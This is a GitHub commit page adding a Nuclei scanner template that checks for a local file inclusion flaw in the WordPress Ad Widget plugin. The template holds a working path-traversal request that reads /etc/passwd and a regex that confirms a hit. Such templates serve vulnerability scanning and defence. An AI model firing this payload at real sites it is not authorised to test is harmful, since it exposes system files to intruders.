Skip to content

Commit

Permalink
Auto Update Nuclei [Sat Nov 6 01:06:52 UTC 2021] :robot:
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Nov 6, 2021
1 parent 6c758b5 commit 845bb09
Showing 1 changed file with 27 additions and 0 deletions.
27 changes: 27 additions & 0 deletions plugins/wordpress/ad-widget-lfi.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
id: ad-widget-lfi

info:
name: WordPress Plugin WordPress Ad Widget Local File Inclusion (2.11.0)
author: 0x_Akoko
severity: high
description: Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
reference:
- https://cxsecurity.com/issue/WLB-2017100084
- https://plugins.trac.wordpress.org/changeset/1628751/ad-widget
tags: wordpress,wp-plugin,lfi

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:[x*]:0:0"

- type: status
status:
- 200

0 comments on commit 845bb09

Please sign in to comment.